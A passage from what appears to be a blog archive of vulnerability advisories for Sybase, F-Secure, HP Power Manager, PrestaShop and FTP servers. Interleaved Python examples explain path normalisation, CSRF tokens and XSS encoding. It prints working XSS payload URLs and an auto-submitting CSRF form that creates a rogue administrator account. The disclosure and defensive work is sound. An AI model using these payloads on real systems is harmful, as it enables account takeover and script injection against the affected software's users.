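    if re.match(r"^[A-Za-z]:", p):
        return None
    # Collapse "." and ".." relative to the root; anything that still starts
    # with ".." after normalisation escapes the root and is rejected.
    norm = posixpath.normpath(p.lstrip("/"))
    if norm == ".." or norm.startswith("../"):
        return None
    if norm == ".":
        return web_root
    return posixpath.join(web_root, norm)
```

Two details carry the weight: normalising before comparing (so `images/../index.html` is fine but eight `..` segments are not) and treating the backslash as a separator, since the operating system underneath will. Checking for `../` as a substring would pass the advisory's payload because no two dots are ever followed directly by a forward slash.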




Solution
Sybase has released patches which address this issue. Please see the references for more information.

References
Vendor URL: http://www.sybase.com/detail?id=1093216
iDefense: http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=912
Secunia: http://secunia.com/advisories/44666/

Disclosure Timeline
2011-01-25 - Vulnerability discovered.
2011-01-25 - Vulnerability reported to iDefense.
2011-03-29 - iDefense confirmed the vulnerability and contacted the vendor.
2011-05-23 - Patch released.
2011-05-25 - Advisory published by iDefense.
Posted in Directory Traversal, Sybase | No comments

Thursday, 19 April 2012

F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability

Posted on 08:11 by freda
Description
F-Secure Policy Manager Web Reporting allows administrators to identify computers that are unprotected or vulnerable to virus outbreaks before they actually occur.

Sow Ching Shiong, an independent vulnerability researcher, has identified a Path Disclosure and Cross-Site Scripting vulnerability in F-Secure Policy Manager Web Reporting. This issue was discovered in a default installation of F-Secure Policy Manager Web Reporting 9.00.30231. Other earlier versions may also be affected.


Proof of concept

Path Disclosure
============
http://[target]:8081/report/infection-table.html




Cross-Site Scripting (XSS)
====================
http://[target]:8081/'"--></style></script><script>alert(1)</script>




Solution
F-Secure recommends that administrators of the affected systems patch or upgrade their systems.

References

Vendor URL: http://www.f-secure.com/en/web/labs_global/fsc-2011-2
Secunia: http://secunia.com/advisories/43049/

Disclosure Timeline
2011-01-17 - Vulnerability discovered.
2011-01-17 - Vulnerability reported to Secunia.
2011-01-25 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-24 - Patch released.
2011-02-24 - Advisory published by Secunia.
Posted in F-Secure, XSS

HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Posted on 05:52 by freda
Description
HP Power Manager (HPPM) is a web-based application that enables administrators to manage an HP UPS from a browser-based management console. Administrators can monitor, manage, and control a single UPS locally and remotely.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in HP Power Manager. These issues were discovered in a default installation of HP Power Manager 4.3.2. Other earlier versions may also be affected.


Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<form action="http://[target]/goform/formSetUsers" id="csrf" method="post">
<input type="hidden" name="name9" value="attacker" />
<input type="hidden" name="pass9" value="passwd123" />
<input type="hidden" name="rpass9" value="passwd123" />
<input type="hidden" name="admin9" value="on" />
<input type="hidden" name="actionType" value="1" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

  • http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2&SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/applicationlogs.asp?SORTCOL=2"%20onMouseOver%3dalert%281%29%2f%2f&SORTORD=2&TIME=0&PAGE=1&ITEMSPERPAGE=20
  • http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e

Solution
HP recommends the following:

  • Open a browser instance, log on to HPPM, perform needed task, and log off from HPPM.
  • Do not visit untrusted web sites while logged on to HPPM.
  • Use a firewall to limit access to HPPM.
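HP's recommendations above are operational workarounds; they do not change the fact that /goform/formSetUsers accepts any POST the browser can be tricked into sending with the administrator's cookie. The server-side fix is an anti-CSRF token that the attacker's page cannot read. The Python below is an added example of that pattern (not HP's code and not the fix HP shipped): the token is an HMAC over the session identifier, the legitimate form embeds it as a hidden field, and the handler rejects exactly the request the advisory's PoC form produces. The origin http://hppm.example, the secret and the session identifiers are constructed values.

```python
import hashlib
import hmac
import secrets
from typing import Mapping, Optional

# Constructed values for the example; neither comes from HP Power Manager.
EXPECTED_ORIGIN = "http://hppm.example"
SERVER_SECRET = secrets.token_bytes(32)   # a real server keeps this out of source control


def issue_csrf_token(session_id: str) -> str:
    """Derive the token from the login session: a token captured in one session
    is useless in another, and nothing has to be stored server-side."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_set_users_form(session_id: str) -> str:
    """The legitimate page carries the token as a hidden field beside the
    fields the advisory's PoC sets (name9, pass9, rpass9, admin9, actionType)."""
    return (
        '<form action="/goform/formSetUsers" method="post">'
        f'<input type="hidden" name="csrf_token" value="{issue_csrf_token(session_id)}" />'
        '<input name="name9" /><input type="password" name="pass9" />'
        '<input type="password" name="rpass9" /><input type="checkbox" name="admin9" />'
        '<input type="hidden" name="actionType" value="1" />'
        '</form>'
    )


def form_set_users(session_id: str, origin: Optional[str], form: Mapping[str, str]) -> bool:
    """Hardened handler: True only if the account would be created.
    session_id comes from the authenticated cookie, which the browser attaches
    to the attacker's cross-site POST as well; the token is what it cannot attach."""
    # Browsers add Origin to cross-site POSTs and page script cannot remove it,
    # so a mismatch is a cheap early reject. A missing header (older clients)
    # is not trusted; it simply falls through to the token check.
    if origin is not None and origin != EXPECTED_ORIGIN:
        return False
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, issue_csrf_token(session_id)):
        return False
    if form.get("pass9") != form.get("rpass9"):
        return False
    # ... create the account named form["name9"] here ...
    return True
```

The PoC form from the advisory, replayed against form_set_users with the victim's session but without a token, is refused; the same fields with the token from the victim's own rendered form are accepted, and that token is refused under any other session.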

References

Vendor URL: http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131
Secunia: http://secunia.com/advisories/43058/

Disclosure Timeline
2011-01-25 - CSRF Vulnerability discovered.
2011-01-25 - CSRF Vulnerability reported to Secunia.
2011-01-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-07 - HP released recommendation for CSRF.
2011-02-08 - Advisory published by Secunia.
2011-02-10 - XSS Vulnerability discovered.
2011-02-10 - XSS Vulnerability reported to Secunia.
2011-02-10 - Secunia confirmed the vulnerability and contacted the vendor.
2011-03-09 - HP released recommendation for XSS.
2011-03-10 - Advisory updated by Secunia.
Posted in CSRF, HP, XSS

Wednesday, 18 April 2012

PrestaShop 1.3.3 Cross-Site Scripting (XSS) Vulnerability

Posted on 20:48 by freda
Description
PrestaShop is an e-commerce solution which is free and open source. It supports payment gateways such as Google Checkout, Authorize.net, Skrill, PayPal and Payments Pro via API. Further payment modules are offered commercially.

Sow Ching Shiong, an independent vulnerability researcher has identified a Cross-Site Scripting vulnerability in PrestaShop. This issue was discovered in a default installation of PrestaShop 1.3.3. Other earlier versions may also be affected.


Proof of concept
http://[target]/[path]/search.php?'"--></style></script><script>alert(1)</script>
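The string '"--></style></script><script>alert(1)</script> used here and in the F-Secure advisory above is a context-breakout probe: '" terminates a quoted string, --> closes an HTML comment, </style> and </script> close the raw-text elements, and what follows runs wherever the value was reflected. The HP advisory's payloads show two further cases, an attribute breakout (2" onMouseOver=alert(1)//) and a double-URL-encoded script tag, which implies the application decodes the parameter a second time before reflecting it. The Python below is an added example (not F-Secure's, HP's or PrestaShop's code) using a constructed template that reflects a parameter into a JavaScript string, a style block and an attribute; it shows why a single decode misses the HP payload and contrasts the unencoded rendering with one encoder per context.

```python
import html
import json
from urllib.parse import unquote_plus

# Payloads as given in the advisories on this page.
BREAKOUT = '\'"--></style></script><script>alert(1)</script>'   # F-Secure and PrestaShop PoC
HP_SORTORD = '2"%20onMouseOver%3dalert%281%29%2f%2f'               # HP applicationlogs.asp PoC
HP_LOGTYPE = 'Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e'  # HP exportlogs.asp PoC


def decode_param(raw: str, rounds: int = 1) -> str:
    """Form-decode a query parameter the given number of times ('+' becomes space)."""
    for _ in range(rounds):
        raw = unquote_plus(raw)
    return raw


def reflect_unsafe(value: str) -> str:
    """Vulnerable pattern: the decoded parameter lands in three contexts with no
    encoding (constructed template, not any vendor's markup)."""
    return (
        f'<script>var q = "{value}";</script>'
        f'<style>/* {value} */</style>'
        f'<a href="?sort={value}">sort</a>'
    )


def js_string(value: str) -> str:
    """JSON-encode for a JS string literal, then turn <, > and & into JavaScript
    unicode escapes so a literal '</script>' inside the string cannot end the block."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


def reflect_safe(value: str) -> str:
    """Hardened pattern: one encoder per context, and no reflection at all into
    <style>, where no escaping scheme makes untrusted text safe."""
    return (
        f'<script>var q = {js_string(value)};</script>'
        f'<a href="?sort={html.escape(value, quote=True)}">sort</a>'
    )


def injected_script(markup: str) -> bool:
    """Comparison heuristic only: the template itself has exactly one <script> tag."""
    return markup.lower().count("<script") > 1
```

One decode of the exportlogs.asp value yields Application%3cscript+%3ealert%281%29%3b%3c%2fscript+%3e, which contains no angle brackets and passes a filter that inspects the once-decoded value; the second decode produces the script tag. The safe rendering keeps the attacker's text as data in both remaining contexts.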



Solution
Update to version 1.3.4 or later.

References

Vendor URL: http://www.prestashop.com/en/developers-versions/changelog/1.3.4.0
Secunia: http://secunia.com/advisories/42503/

Disclosure Timeline
2010-12-06 - Vulnerability discovered.
2010-12-06 - Vulnerability reported to Secunia.
2010-12-10 - Secunia confirmed the vulnerability and contacted the vendor.
2010-12-22 - Patch released.
2010-12-22 - Advisory published by Secunia.
Posted in XSS

CompleteFTP Server 4.0.2 Directory Traversal Vulnerability

Posted on 20:15 by freda
Description
CompleteFTP Server is a high-performance Windows FTP server supporting FTP, FTPS, SFTP and SCP. It supports both Windows and non-Windows user accounts and a fully configurable virtual file system.

Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in CompleteFTP Server. This issue was discovered in a default installation of CompleteFTP Server 4.0.2. Other earlier versions may also be affected.

Proof of concept





Solution
Update to version 4.0.3 or later.

References

Vendor URL: http://www.enterprisedt.com/products/completeftp/history.html
Secunia: http://secunia.com/advisories/39852/

Disclosure Timeline
2010-05-18 - Vulnerability discovered.
2010-05-18 - Vulnerability reported to Secunia.
2010-05-19 - Secunia confirmed the vulnerability and contacted the vendor.
2010-06-02 - Patch released.
2010-06-02 - Advisory published by Secunia.
Posted in Directory Traversal

SnugServer FTP Server 4.3.0.126 Directory Traversal Vulnerability

Posted on 02:20 by freda
Description
SnugServer is an Email Server, Web Server, FTP Server, NewsServer and ListServer. It's your all-in-one solution to managing your Internet Presence. Send/receive emails through your own server, host your own website(s) and so much more.

Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in SnugServer FTP Server. This issue was discovered in a default installation of SnugServer FTP Server 4.3.0.126. Other earlier versions may also be affected.

Proof of concept



Solution
Update to version 4.3.0.134 or later.

Reference
Secunia: http://secunia.com/advisories/39866/

Disclosure Timeline
2010-05-20 - Vulnerability discovered.
2010-05-20 - Vulnerability reported to Secunia.
2010-05-20 - Secunia confirmed the vulnerability and contacted the vendor.
2010-05-21 - Patch released.
2010-05-21 - Advisory published by Secunia.
Posted in Directory Traversal

Tuesday, 17 April 2012

FileCOPA FTP Server 5.02 Directory Traversal Vulnerability

Posted on 19:32 by freda
Description
FileCOPA is a commercial FTP server for Windows that is available as shareware.

Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in FileCOPA FTP Server. This issue was discovered in a default installation of FileCOPA FTP Server 5.02. Other earlier versions may also be affected.

Proof of concept



Solution
Update to version 5.03 or later.

Reference
Secunia: http://secunia.com/advisories/39843/

Disclosure Timeline
2010-05-19 - Vulnerability discovered.
2010-05-19 - Vulnerability reported to Secunia.
2010-05-20 - Secunia confirmed the vulnerability and contacted the vendor.
2010-05-21 - Patch released.
2010-05-21 - Advisory published by Secunia.
Posted in Directory Traversal